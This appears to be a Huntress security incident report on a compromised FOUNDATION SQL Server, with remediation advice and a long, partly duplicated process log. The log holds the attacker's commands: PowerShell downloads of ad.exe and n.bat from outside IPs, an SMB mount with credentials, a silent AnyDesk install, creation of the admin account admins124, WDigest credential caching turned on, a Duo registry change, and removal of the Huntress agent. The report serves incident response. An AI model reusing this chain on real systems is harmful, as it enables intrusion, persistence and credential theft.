Investigative Summary
---------------------
Huntress detected the following:

We have identified malicious activity coming from the sqlservr.exe parent process (FOUNDATION Software) that is consistent with a compromised SQL server. This parent process installed an AnyDesk remote access application and created a new user, "admins124" and added them to the "Remote Desktop Users"

Additionally, the Huntress agent has been uninstalled; this activity is of critical risk. We recommend you keep this host machine isolated until you can apply the latest security updates and patches. 


Engage your incident response procedures 

Remediation Instructions
------------------------
- Engage your incident responses procedures 
- disable the "admins124" user account
- Apply the latest security updates and patches to your Foundations software.


Processes
---------
Start Time: 2025-02-03 23:16:10 UTC
Command: powershell  Invoke-WebRequest -Uri "http://87.121.86.35/ad.exe" -OutFile "c:\users\public\music\ad.exe"
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09d3c8-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:16:11 UTC
Command: powershell  Invoke-WebRequest -Uri "http://87.121.86.35/n.bat" -OutFile "c:\users\public\music\n.bat"
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09d3dd-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:16:11 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell Invoke-WebRequest -Uri "http://87.121.86.35/n.bat" -OutFile "c:\users\public\music\n.bat"
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09d3d6-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:13:27 UTC
Command: "C:\Windows\system32\cmd.exe" /c bcp "select binaryTable from uGnzBdZbsi" queryout "c:\users\public\music\n.bat" -T -f "c:\users\public\music\FODsOZKgAU.txt"
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09d0d6-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:05:49 UTC
Command: "C:\Windows\system32\cmd.exe" /c xcopy H:\n.bat C:\users\public\music\ /Y
Executable: C:\Windows\system32\cmd.exe
Process ID: 9bfde16f-e281-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:06:36 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell Invoke-WebRequest -Uri "http://87.121.86.35/n.bat" -OutFile "c:\users\public\music\n.bat"
Executable: C:\Windows\system32\cmd.exe
Process ID: 9bfde26b-e281-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:27:41 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell Invoke-WebRequest -Uri "http://173.249.209.19/AD.exe" -OutFile "c:\users\public\music\ad.bat"
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09df2f-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:59 UTC
Command: "C:\Windows\system32\cmd.exe" /c c:\users\public\music\n.bat
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e12a-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:52 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell Invoke-WebRequest -Uri "http://173.249.209.19/n.bat" -OutFile "c:\users\public\music\n.bat"
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e103-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:45:47 UTC
Command: c:\users\public\music\AD.exe  --install C:\"Program Files (x86)"\ --silent"
Executable: c:\users\public\music\ad.exe
Process ID: eb09f201-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-04 00:07:29 UTC
Command: c:\users\public\music\AD.exe  --install C:\"Program Files (x86)"\ --silent"
Executable: c:\users\public\music\ad.exe
Process ID: 4cfba8d8-e28b-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-04 00:07:37 UTC
Command: c:\users\public\music\AD.exe  --install C:\"Program Files (x86)"\ --silent"
Executable: c:\users\public\music\ad.exe
Process ID: 4cfba8f3-e28b-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:36:54 UTC
Command: c:\users\public\music\AD.exe  --install C:\"Program Files (x86)"\ --silent"
Executable: c:\users\public\music\ad.exe
Process ID: eb09ea3b-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:36:46 UTC
Command: c:\users\public\music\AD.exe  --install C:\"Program Files (x86)"\ --silent"
Executable: c:\users\public\music\ad.exe
Process ID: eb09ea18-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:29:00 UTC
Command: c:\users\public\music\AD.exe  --install C:\"Program Files (x86)"\ --silent
Executable: c:\users\public\music\ad.exe
Process ID: eb09e160-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:30:30 UTC
Command: c:\users\public\music\AD.exe  --install C:\"Program Files (x86)"\ --silent"
Executable: c:\users\public\music\ad.exe
Process ID: eb09e393-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:50:57 UTC
Command: "C:\Users\admins124\Documents\ipscan25.exe"
Executable: C:\Users\admins124\Documents\ipscan25.exe
Process ID: 9d68e441-e289-11ef-a39a-00155d014102
Parent Process: C:\Windows\Explorer.EXE
User: admins124

Start Time: 2025-02-03 23:45:53 UTC
Command: c:\users\public\music\AD.exe  --install C:\"Program Files (x86)"\ --silent"
Executable: c:\users\public\music\ad.exe
Process ID: eb09f224-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-04 00:07:29 UTC
Command: c:\users\public\music\AD.exe  --install C:\"Program Files (x86)"\ --silent"
Executable: c:\users\public\music\ad.exe
Process ID: 4cfba8d8-e28b-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-04 00:07:37 UTC
Command: c:\users\public\music\AD.exe  --install C:\"Program Files (x86)"\ --silent"
Executable: c:\users\public\music\ad.exe
Process ID: 4cfba8f3-e28b-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:36:46 UTC
Command: c:\users\public\music\AD.exe  --install C:\"Program Files (x86)"\ --silent"
Executable: c:\users\public\music\ad.exe
Process ID: eb09ea18-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:36:54 UTC
Command: c:\users\public\music\AD.exe  --install C:\"Program Files (x86)"\ --silent"
Executable: c:\users\public\music\ad.exe
Process ID: eb09ea3b-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:29:00 UTC
Command: c:\users\public\music\AD.exe  --install C:\"Program Files (x86)"\ --silent
Executable: c:\users\public\music\ad.exe
Process ID: eb09e160-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:30:30 UTC
Command: c:\users\public\music\AD.exe  --install C:\"Program Files (x86)"\ --silent"
Executable: c:\users\public\music\ad.exe
Process ID: eb09e393-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:35:40 UTC
Command: powershell  net user
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09e8e1-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:35:41 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell net user /do
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e8f5-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:35:41 UTC
Command: powershell  net user /do
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09e8fb-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:04:54 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell net user /do
Executable: C:\Windows\system32\cmd.exe
Process ID: 9bfddffc-e281-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:04:53 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell net user
Executable: C:\Windows\system32\cmd.exe
Process ID: 9bfddfd5-e281-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:04:54 UTC
Command: powershell  net user /do
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 9bfde005-e281-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:33:52 UTC
Command: "C:\Windows\system32\cmd.exe" /c net user admins124 @@@Music123.. /add
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e76f-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:35:40 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell net user
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e8db-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:34:04 UTC
Command: "C:\Windows\system32\cmd.exe" /c net localgroup administrators admins124 /add
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e7a6-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:33:01 UTC
Command: powershell  net user
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09e679-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:33:02 UTC
Command: powershell  net user /do
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09e692-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:33:02 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell net user /do
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e68c-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:33:01 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell net user
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e672-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:05:49 UTC
Command: xcopy  H:\n.bat C:\users\public\music\ /Y
Executable: C:\Windows\system32\xcopy.exe
Process ID: 9bfde176-e281-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:05:27 UTC
Command: net  use h: \\87.121.86.35\a /user:a !DU?123aA.
Executable: C:\Windows\system32\net.exe
Process ID: 9bfde113-e281-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:35:40 UTC
Command: powershell  net user
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09e8e1-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:35:41 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell net user /do
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e8f5-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:35:41 UTC
Command: powershell  net user /do
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09e8fb-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:04:53 UTC
Command: powershell  net user
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 9bfddfdc-e281-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:04:54 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell net user /do
Executable: C:\Windows\system32\cmd.exe
Process ID: 9bfddffc-e281-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:04:54 UTC
Command: powershell  net user /do
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 9bfde005-e281-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:34:04 UTC
Command: "C:\Windows\system32\cmd.exe" /c net localgroup administrators admins124 /add
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e7a6-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:33:52 UTC
Command: "C:\Windows\system32\cmd.exe" /c net user admins124 @@@Music123.. /add
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e76f-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:35:40 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell net user
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e8db-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:33:01 UTC
Command: powershell  net user
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09e679-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:33:02 UTC
Command: powershell  net user /do
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09e692-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:33:02 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell net user /do
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e68c-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:33:01 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell net user
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e672-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:05:49 UTC
Command: xcopy  H:\n.bat C:\users\public\music\ /Y
Executable: C:\Windows\system32\xcopy.exe
Process ID: 9bfde176-e281-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:13:27 UTC
Command: bcp  "select binaryTable from uGnzBdZbsi" queryout "c:\users\public\music\n.bat" -T -f "c:\users\public\music\FODsOZKgAU.txt"
Executable: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\bcp.exe
Process ID: eb09d0dc-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:11:59 UTC
Command: bcp  "select binaryTable from uGnzBdZbsi" queryout "c:\users\public\music\AD.exe" -T -f "c:\users\public\music\FODsOZKgAU.txt"
Executable: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\bcp.exe
Process ID: eb09ce53-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:12:17 UTC
Command: bcp  "select binaryTable from uGnzBdZbsi" queryout "c:\users\public\music\n.bat" -T -f "c:\users\public\music\FODsOZKgAU.txt"
Executable: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\bcp.exe
Process ID: eb09ced5-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:13:10 UTC
Command: bcp  "select binaryTable from uGnzBdZbsi" queryout "c:\users\public\music\AD.exe" -T -f "c:\users\public\music\FODsOZKgAU.txt"
Executable: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\bcp.exe
Process ID: eb09d003-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:11:59 UTC
Command: bcp  "select binaryTable from uGnzBdZbsi" queryout "c:\users\public\music\AD.exe" -T -f "c:\users\public\music\FODsOZKgAU.txt"
Executable: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\bcp.exe
Process ID: eb09ce53-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:13:10 UTC
Command: bcp  "select binaryTable from uGnzBdZbsi" queryout "c:\users\public\music\AD.exe" -T -f "c:\users\public\music\FODsOZKgAU.txt"
Executable: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\bcp.exe
Process ID: eb09d003-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:12:17 UTC
Command: bcp  "select binaryTable from uGnzBdZbsi" queryout "c:\users\public\music\n.bat" -T -f "c:\users\public\music\FODsOZKgAU.txt"
Executable: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\bcp.exe
Process ID: eb09ced5-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:13:27 UTC
Command: bcp  "select binaryTable from uGnzBdZbsi" queryout "c:\users\public\music\n.bat" -T -f "c:\users\public\music\FODsOZKgAU.txt"
Executable: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\bcp.exe
Process ID: eb09d0dc-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:35:00 UTC
Command: reg  query "HKEY_LOCAL_MACHINE\Software\Duo Security\DuoCredProv"
Executable: C:\Windows\system32\reg.exe
Process ID: eb09e877-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:35:01 UTC
Command: reg  add "HKEY_LOCAL_MACHINE\Software\Duo Security\DuoCredProv" /v rdponly /t REG_DWORD /d 1 /f
Executable: C:\Windows\system32\reg.exe
Process ID: eb09e885-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:34:04 UTC
Command: net  localgroup administrators admins124 /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09e7b4-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:29:00 UTC
Command: net  localgroup Administratoren admins124 /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09e150-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:29:00 UTC
Command: net  localgroup Administrateurs admins124 /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09e155-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:29:03 UTC
Command: REG  ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest" /v UseLogonCredential /t REG_DWORD /d 0x00000001
Executable: C:\Windows\system32\reg.exe
Process ID: eb09e176-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:59 UTC
Command: net  localgroup administrators admins124 /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09e143-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:04 UTC
Command: REG  ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest" /v UseLogonCredential /t REG_DWORD /d 0x00000001
Executable: C:\Windows\system32\reg.exe
Process ID: eb09dfbb-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:29:00 UTC
Command: net  localgroup "Remote Desktop Users" admins124 /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09e15a-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:03 UTC
Command: net  localgroup Administratoren admins124 /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09dfa5-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:03 UTC
Command: net  localgroup Administrateurs admins124 /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09dfaa-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:03 UTC
Command: net  localgroup Administradores admins124 /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09dfa0-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:03 UTC
Command: net  localgroup administrators admins124 /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09df9b-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:03 UTC
Command: net  localgroup "Remote Desktop Users" admins124 /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09dfb0-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:59 UTC
Command: net  localgroup Administradores admins124 /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09e14b-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:33:52 UTC
Command: C:\Windows\system32\net1  user admins124 @@@Music123.. /add
Executable: C:\Windows\system32\net1.exe
Process ID: eb09e778-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\net.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:03 UTC
Command: net  user admins124 @@@Music123.. /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09df94-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:33:52 UTC
Command: net  user admins124 @@@Music123.. /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09e775-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:33:52 UTC
Command: "C:\Windows\system32\cmd.exe" /c net user admins124 @@@Music123.. /add
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09e76f-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:59 UTC
Command: net  user admins124 @@@Music123.. /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09e130-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:59 UTC
Command: C:\Windows\system32\net1  user admins124 @@@Music123.. /add
Executable: C:\Windows\system32\net1.exe
Process ID: eb09e133-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\net.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:03 UTC
Command: C:\Windows\system32\net1  user admins124 @@@Music123.. /add
Executable: C:\Windows\system32\net1.exe
Process ID: eb09df97-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\net.exe
User: SYSTEM

Start Time: 2025-02-03 23:57:59 UTC
Command: "C:\Program Files\Huntress\Uninstall.exe"
Executable: C:\Program Files\Huntress\Uninstall.exe
Process ID: 9d68f119-e289-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\DllHost.exe
User: Administrator

Start Time: 2025-02-03 23:54:32 UTC
Command: "C:\Program Files\Huntress\Uninstall.exe"
Executable: C:\Program Files\Huntress\Uninstall.exe
Process ID: 9d68e98b-e289-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\DllHost.exe
User: admins124

Start Time: 2025-02-03 23:28:04 UTC
Command: REG  ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest" /v UseLogonCredential /t REG_DWORD /d 0x00000001
Executable: C:\Windows\system32\reg.exe
Process ID: eb09dfbb-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:29:03 UTC
Command: REG  ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest" /v UseLogonCredential /t REG_DWORD /d 0x00000001
Executable: C:\Windows\system32\reg.exe
Process ID: eb09e176-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:04 UTC
Command: REG  ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest" /v UseLogonCredential /t REG_DWORD /d 0x00000001
Executable: C:\Windows\system32\reg.exe
Process ID: eb09dfbb-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:29:03 UTC
Command: REG  ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest" /v UseLogonCredential /t REG_DWORD /d 0x00000001
Executable: C:\Windows\system32\reg.exe
Process ID: eb09e176-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:29:00 UTC
Command: net  localgroup "Remote Desktop Users" admins124 /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09e15a-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:28:03 UTC
Command: net  localgroup "Remote Desktop Users" admins124 /add
Executable: C:\Windows\system32\net.exe
Process ID: eb09dfb0-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM